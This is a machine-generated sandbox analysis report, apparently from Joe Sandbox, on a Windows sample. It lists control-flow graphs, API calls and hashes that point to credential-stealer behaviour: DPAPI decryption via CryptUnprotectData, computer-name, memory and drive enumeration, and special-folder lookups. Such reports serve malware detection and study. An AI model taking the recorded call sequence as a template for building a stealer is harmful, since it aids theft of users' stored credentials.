                                                                                                          • SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
                                                                                                          • SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
                                                                                                          • VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00438E8F
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00438EB3
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00438EB9
                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00438EC6
                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                          • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                                          • API String ID: 2573436264-4038474941
                                                                                                          • Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                                          • Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
                                                                                                          • Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                                          • Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 83 419362-419374 84 419380-4193bb 83->84 84->84 85 4193bd-4193c5 84->85 86 4193c7-4193d6 85->86 87 41940a-419465 call 401a50 85->87 89 4193e0-4193e7 86->89 93 419470-4194d2 87->93 91 4193f0-4193f6 89->91 92 4193e9-4193ec 89->92 91->87 95 4193f8-419407 call 43d910 91->95 92->89 94 4193ee 92->94 93->93 96 4194d4-4194fb call 401d90 93->96 94->87 95->87 101 419502-41956f 96->101 102 4195f2-4195f4 96->102 103 41933a 96->103 104 419570-4195c7 101->104 105 419600-419606 102->105 106 419340-419349 call 407ee0 103->106 104->104 107 4195c9-4195eb call 401d90 104->107 105->105 108 419608-41963e 105->108 120 41934c-419351 106->120 107->101 107->102 107->106 119 419360 107->119 107->120 109 419640-419643 108->109 110 419645-419648 108->110 109->110 113 41964a 109->113 114 41964c-419658 110->114 113->114 117 41965a-41965d 114->117 118 41965f 114->118 117->118 122 419660-41967e call 407ed0 117->122 118->122 119->119 120->119 125 419795-4197f4 call 43f450 CryptUnprotectData 122->125 126 419684-41968b 122->126 125->101 125->102 127 4196b2-4196fc call 41d140 * 2 126->127 134 4196a0-4196ac 127->134 135 4196fe-419719 call 41d140 127->135 134->125 134->127 135->134 138 41971b-419743 135->138 139 419691-419695 138->139 140 419749-41975f call 41d140 138->140 139->134 143 419765-419790 140->143 144 41968d 140->144 143->134 144->139
                                                                                                          APIs
                                                                                                            • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataInitializeThunkUnprotect
                                                                                                          • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                                          • API String ID: 279577407-4262920783
                                                                                                          • Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                                          • Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
                                                                                                          • Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                                          • Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 271 4229cd-4229d9 272 4229e0-4229fd 271->272 273 422a10-422a1f 271->273 274 422ad0 271->274 275 422a40-422a4e 271->275 276 422ad6-422ae6 271->276 277 422a26-422a39 271->277 278 422a6f-422a7f 271->278 272->273 272->274 272->275 272->276 272->277 272->278 273->273 273->274 273->275 273->277 273->278 275->273 275->278 279 422a60-422a68 275->279 282 422b40 276->282 283 422e31-422e63 call 40a600 276->283 285 422b58-422b74 276->285 287 422aed-422b2c call 43f450 * 2 276->287 288 422e6a-422e7d 276->288 277->273 277->274 277->275 277->278 278->274 278->276 278->279 280 422aa0-422aab 278->280 281 422ac0 278->281 278->282 278->283 284 422a86-422a99 278->284 278->285 286 422aae-422ab4 278->286 278->287 279->273 279->278 280->286 281->274 317 422b48-422b51 282->317 283->288 290 422eb2-422eb7 283->290 291 422e90-422eab 283->291 292 422ee5-422ef7 283->292 293 422ebe-422ede 283->293 321 422f00-422f12 283->321 284->274 284->276 284->279 284->280 284->281 284->282 284->283 284->285 284->286 284->287 284->288 294 422be2-422bea 285->294 295 422bc0 285->295 296 422b80-422b8a 285->296 297 422c60-422c68 285->297 298 422dc0-422dd2 285->298 299 422c24-422c57 285->299 300 422d89-422d95 285->300 301 422bd0-422bd8 285->301 302 422c10-422c1d 285->302 303 422c70-422c79 285->303 304 422b91-422bb9 285->304 305 422bf7-422c07 285->305 306 422dd9-422de8 285->306 307 422d9c-422db0 285->307 286->281 287->282 287->283 287->288 287->290 287->291 287->292 287->293 287->321 288->290 288->291 288->292 288->293 290->291 290->293 291->290 291->292 291->293 292->282 292->317 320 422e22-422e2a 292->320 292->321 293->290 293->291 293->292 294->305 295->301 296->294 296->295 296->296 296->297 296->298 296->299 296->300 296->301 296->302 296->303 296->304 296->305 296->306 296->307 319 422c7d-422c8a 297->319 298->306 310 423022-42302c 298->310 311 423020 298->311 312 423120-423187 298->312 313 423001-423013 298->313 314 422def-422df6 298->314 315 423016-42301f 298->315 316 422dff-422e09 298->316 299->297 300->294 300->295 300->296 300->297 300->298 300->299 300->301 300->302 300->303 300->305 300->306 300->307 300->310 300->311 300->312 300->313 300->314 300->315 300->316 301->294 302->296 302->297 302->298 302->299 302->303 302->306 303->319 304->294 304->295 304->296 304->297 304->298 304->299 304->301 304->302 304->303 304->305 304->306 305->296 305->297 305->298 305->299 305->302 305->303 305->306 306->310 306->311 306->312 306->313 306->314 306->315 306->316 307->298 307->306 307->310 307->311 307->312 307->313 307->314 307->315 307->316 324 423190-4231be 312->324 313->315 314->316 315->311 316->315 317->282 317->285 317->292 317->317 317->320 326 422c90-422cfe 319->326 320->282 320->283 320->288 320->290 320->291 320->292 320->293 320->321 328 422f20-422f8a 321->328 324->324 332 4231c0-423208 RtlExpandEnvironmentStrings 324->332 326->326 334 422d00-422d10 326->334 328->328 335 422f8c-422f97 328->335 336 423210-42325f 332->336 334->296 337 422d16-422d25 334->337 338 422e10-422e1b 335->338 339 422f9d-422fa9 335->339 336->336 340 423261-42326e 336->340 341 422d30-422d37 337->341 338->282 338->317 338->320 342 422fb0-422fb7 339->342 345 4232d2-4232db 340->345 346 4235e1-42366e 340->346 347 4235c6 340->347 348 4235b6-4235be 340->348 349 4232b4 340->349 350 423275-4232ad call 407ed0 RtlExpandEnvironmentStrings 340->350 351 4232c5-4232ca 340->351 352 423448-4234f4 call 407ed0 340->352 353 42342f-423441 340->353 354 4232dc-42332b call 407ed0 340->354 355 4232bc-4232c2 call 407ee0 340->355 356 422d43-422d49 341->356 357 422d39-422d3c 341->357 343 422fc3-422fc9 342->343 344 422fb9-422fbc 342->344 343->338 359 422fcf-422ff6 call 43d910 343->359 344->342 358 422fbe 344->358 360 423670-423684 346->360 348->347 349->355 350->346 350->347 350->348 350->349 350->351 350->352 350->353 350->354 350->355 363 4232d0 351->363 399 423500-423536 352->399 353->345 353->346 353->347 353->348 353->351 353->352 353->355 361 4236a4-4236bb 353->361 362 4235cc-4235d2 call 407ee0 353->362 353->363 364 4237b4 353->364 365 4237ba-4237c2 call 407ee0 353->365 366 4235db 353->366 397 423330-4233ad 354->397 355->351 356->296 371 422d4f-422d82 call 43d910 356->371 357->341 370 422d3e 357->370 358->338 359->313 360->360 376 423686-423694 call 421060 360->376 377 4236c0-4236fc 361->377 362->366 370->296 371->294 371->295 371->296 371->297 371->298 371->299 371->300 371->301 371->302 371->303 371->304 371->305 371->306 371->307 371->310 371->311 371->312 371->313 371->314 371->315 371->316 393 423699-42369c 376->393 377->377 387 4236fe-423771 377->387 394 423780-423790 387->394 393->361 394->394 398 423792-4237ab call 420c30 394->398 397->397 400 4233af-4233bd 397->400 398->364 399->399 402 423538-423543 399->402 403 4233e1-4233f0 400->403 404 4233bf-4233c4 400->404 406 423561-42356f 402->406 407 423545-42354f 402->407 409 4233f2-4233f5 403->409 410 423411-42341b call 440ba0 403->410 408 4233d0-4233df 404->408 412 423591-4235af GetLogicalDrives call 440ba0 406->412 413 423571-423574 406->413 411 423550-42355f 407->411 408->403 408->408 414 423400-42340f 409->414 418 423420-423428 410->418 411->406 411->411 412->345 412->347 412->348 412->351 412->355 412->361 412->362 412->363 412->364 412->365 412->366 416 423580-42358f 413->416 414->410 414->414 416->412 416->416 418->345 418->346 418->347 418->348 418->351 418->352 418->353 418->355 418->361 418->362 418->363 418->364 418->365 418->366
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "0B$7x~$`*B
                                                                                                          • API String ID: 0-767839351
                                                                                                          • Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                                          • Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
                                                                                                          • Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                                          • Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 420 432fe0-4330cc GetSystemMetrics * 2 426 4330d3-43334a 420->426
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem
                                                                                                          • String ID: $)6C$C7C$Y8C
                                                                                                          • API String ID: 4116985748-1654261340
                                                                                                          • Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                          • Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
                                                                                                          • Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                          • Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 473 408640-408651 call 43d0a0 476 4088e6-4088e8 ExitProcess 473->476 477 408657-40865e call 4354a0 473->477 480 4088e1 call 43d860 477->480 481 408664-40868a GetCurrentProcessId GetCurrentThreadId 477->481 480->476 482 408690-40876a SHGetSpecialFolderPathW 481->482 483 40868c-40868e 481->483 485 408770-40878c 482->485 483->482 485->485 486 40878e-4087bf call 43bc90 485->486 489 4087c0-4087dc 486->489 490 4087f6-40880b GetForegroundWindow 489->490 491 4087de-4087f4 489->491 492 408811-408832 490->492 493 4088ab-4088c3 call 4099e0 490->493 491->489 494 408834-408836 492->494 495 408838-4088a9 492->495 498 4088c5 call 40c660 493->498 499 4088cf-4088d6 493->499 494->495 495->493 502 4088ca call 40b4c0 498->502 499->480 501 4088d8-4088de call 407ee0 499->501 501->480 502->499
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00408664
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040866E
                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
                                                                                                          • GetForegroundWindow.USER32 ref: 00408803
                                                                                                          • ExitProcess.KERNEL32 ref: 004088E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4063528623-0
                                                                                                          • Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                          • Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
                                                                                                          • Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                          • Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 580 42be8a-42bea6 581 42beb0-42bf05 580->581 581->581 582 42bf07-42bf0e 581->582 583 42c284 582->583 584 42bf14-42bf1b 582->584 585 42c287-42c2a5 583->585 586 42bf20-42bf29 584->586 589 42c2b0-42c2dd 585->589 586->586 587 42bf2b 586->587 587->585 589->589 590 42c2df-42c2e6 589->590 591 42c2fb-42c307 590->591 592 42c2e8-42c2ef 590->592 594 42c321-42c348 call 43f450 591->594 595 42c309-42c30b 591->595 593 42c2f0-42c2f9 592->593 593->591 593->593 598 42c34d-42c38f GetPhysicallyInstalledSystemMemory 594->598 597 42c310-42c31d 595->597 597->597 599 42c31f 597->599 600 42c390-42c3e9 598->600 599->594 600->600 601 42c3eb-42c429 call 41dc90 600->601 604 42c430-42c471 601->604 604->604 605 42c473-42c47a 604->605 606 42c47c-42c483 605->606 607 42c49d 605->607 609 42c490-42c499 606->609 608 42c4a0-42c4aa 607->608 611 42c4ac-42c4af 608->611 612 42c4bd 608->612 609->609 610 42c49b 609->610 610->608 614 42c4b0-42c4b9 611->614 613 42c4bf-42c4ce 612->613 615 42c4d0-42c4d7 613->615 616 42c4eb-42c53a 613->616 614->614 617 42c4bb 614->617 618 42c4e0-42c4e9 615->618 619 42c540-42c55e 616->619 617->613 618->616 618->618 619->619 620 42c560-42c567 619->620 621 42c57b-42c588 620->621 622 42c569-42c56f 620->622 624 42c58a-42c591 621->624 625 42c5ab-42c661 621->625 623 42c570-42c579 622->623 623->621 623->623 626 42c5a0-42c5a9 624->626 627 42c662 625->627 626->625 626->626 627->627
                                                                                                          APIs
                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                          • String ID: BVAI
                                                                                                          • API String ID: 3960555810-2651495128
                                                                                                          • Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                          • Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
                                                                                                          • Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                          • Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 632 42c26c-42c2a5 call 4327d0 call 407ee0 638 42c2b0-42c2dd 632->638 638->638 639 42c2df-42c2e6 638->639 640 42c2fb-42c307 639->640 641 42c2e8-42c2ef 639->641 643 42c321-42c348 call 43f450 640->643 644 42c309-42c30b 640->644 642 42c2f0-42c2f9 641->642 642->640 642->642 647 42c34d-42c38f GetPhysicallyInstalledSystemMemory 643->647 646 42c310-42c31d 644->646 646->646 648 42c31f 646->648 649 42c390-42c3e9 647->649 648->643 649->649 650 42c3eb-42c429 call 41dc90 649->650 653 42c430-42c471 650->653 653->653 654 42c473-42c47a 653->654 655 42c47c-42c483 654->655 656 42c49d 654->656 658 42c490-42c499 655->658 657 42c4a0-42c4aa 656->657 660 42c4ac-42c4af 657->660 661 42c4bd 657->661 658->658 659 42c49b 658->659 659->657 663 42c4b0-42c4b9 660->663 662 42c4bf-42c4ce 661->662 664 42c4d0-42c4d7 662->664 665 42c4eb-42c53a 662->665 663->663 666 42c4bb 663->666 667 42c4e0-42c4e9 664->667 668 42c540-42c55e 665->668 666->662 667->665 667->667 668->668 669 42c560-42c567 668->669 670 42c57b-42c588 669->670 671 42c569-42c56f 669->671 673 42c58a-42c591 670->673 674 42c5ab-42c661 670->674 672 42c570-42c579 671->672 672->670 672->672 675 42c5a0-42c5a9 673->675 676 42c662 674->676 675->674 675->675 676->676
                                                                                                          APIs
                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                          • String ID: BVAI
                                                                                                          • API String ID: 3960555810-2651495128
                                                                                                          • Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                          • Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
                                                                                                          • Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                          • Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 677 42c282-42c2a5 679 42c2b0-42c2dd 677->679 679->679 680 42c2df-42c2e6 679->680 681 42c2fb-42c307 680->681 682 42c2e8-42c2ef 680->682 684 42c321-42c38f call 43f450 GetPhysicallyInstalledSystemMemory 681->684 685 42c309-42c30b 681->685 683 42c2f0-42c2f9 682->683 683->681 683->683 690 42c390-42c3e9 684->690 687 42c310-42c31d 685->687 687->687 689 42c31f 687->689 689->684 690->690 691 42c3eb-42c429 call 41dc90 690->691 694 42c430-42c471 691->694 694->694 695 42c473-42c47a 694->695 696 42c47c-42c483 695->696 697 42c49d 695->697 699 42c490-42c499 696->699 698 42c4a0-42c4aa 697->698 701 42c4ac-42c4af 698->701 702 42c4bd 698->702 699->699 700 42c49b 699->700 700->698 704 42c4b0-42c4b9 701->704 703 42c4bf-42c4ce 702->703 705 42c4d0-42c4d7 703->705 706 42c4eb-42c53a 703->706 704->704 707 42c4bb 704->707 708 42c4e0-42c4e9 705->708 709 42c540-42c55e 706->709 707->703 708->706 708->708 709->709 710 42c560-42c567 709->710 711 42c57b-42c588 710->711 712 42c569-42c56f 710->712 714 42c58a-42c591 711->714 715 42c5ab-42c661 711->715 713 42c570-42c579 712->713 713->711 713->713 716 42c5a0-42c5a9 714->716 717 42c662 715->717 716->715 716->716 717->717
                                                                                                          APIs
                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                          • String ID: BVAI
                                                                                                          • API String ID: 3960555810-2651495128
                                                                                                          • Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                          • Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
                                                                                                          • Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                          • Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: =:;8$
                                                                                                          • API String ID: 2994545307-3594289699
                                                                                                          • Opcode ID: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                          • Instruction ID: c423fdc3fd0ad810bcad91faa20af3043e37e718d9259fa2435a4e627f55f2db
                                                                                                          • Opcode Fuzzy Hash: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                          • Instruction Fuzzy Hash: AFA1657AB083104BE724DF64D88066BB7E2EBD5314F19853DDAC297341DA38EC25CB96
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Zysf${ts|
                                                                                                          • API String ID: 2994545307-929106683
                                                                                                          • Opcode ID: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                          • Instruction ID: d8bc85cb00ae77c9a618740bd9c139a142b3571fb9705fb1d300c60273d40d62
                                                                                                          • Opcode Fuzzy Hash: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                          • Instruction Fuzzy Hash: 0F817EB1B083219BD714DF25EC81B3B73A6DBC5314F59843EE58697392E63CAC04839A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: uJ[L$yJ[L
                                                                                                          • API String ID: 0-3296124075
                                                                                                          • Opcode ID: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
                                                                                                          • Instruction ID: 974635f0455fef9b14944d53f12c23bc89291c5e3f93e9d67168785d5e3144d2
                                                                                                          • Opcode Fuzzy Hash: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
                                                                                                          • Instruction Fuzzy Hash: EC31E5B2A405019FDB19CF68CC627AE7BE2EB59310F29417DD252E7790DB3999018718
                                                                                                          APIs
                                                                                                          • LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: D]+\
                                                                                                          • API String ID: 0-1174097187
                                                                                                          • Opcode ID: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
                                                                                                          • Instruction ID: 8b969df8764a6140270626732b9a31d532f0956a4ad419ee8c7d181fdb0ffe63
                                                                                                          • Opcode Fuzzy Hash: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
                                                                                                          • Instruction Fuzzy Hash: A1314878B482008BE7188F42E99073B73A6E7CE300F29753ED481172C6C2389C129B9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
                                                                                                          • Instruction ID: 6d45d2c3cd36f3333d69d70c7c241f502430d0bdfbc6ce3510ca67b0fea4cfba
                                                                                                          • Opcode Fuzzy Hash: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
                                                                                                          • Instruction Fuzzy Hash: 2D614875A583015BDB148F18C851B2BB3A2EFDD310F19A43EE986873A5DB34DC15C74A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 506 42b842-42b84c 507 42b86b-42b8b6 call 43f450 506->507 508 42b84e-42b855 506->508 514 42b8c0-42b8e5 507->514 509 42b860-42b869 508->509 509->507 509->509 514->514 515 42b8e7-42b8f1 514->515 516 42b8f3-42b8fa 515->516 517 42b90b-42b942 GetComputerNameExA 515->517 518 42b900-42b909 516->518 519 42b946 517->519 518->517 518->518 519->519
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerFreeLibraryName
                                                                                                          • String ID: KHGN$#v
                                                                                                          • API String ID: 2904949787-1045450214
                                                                                                          • Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                                          • Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
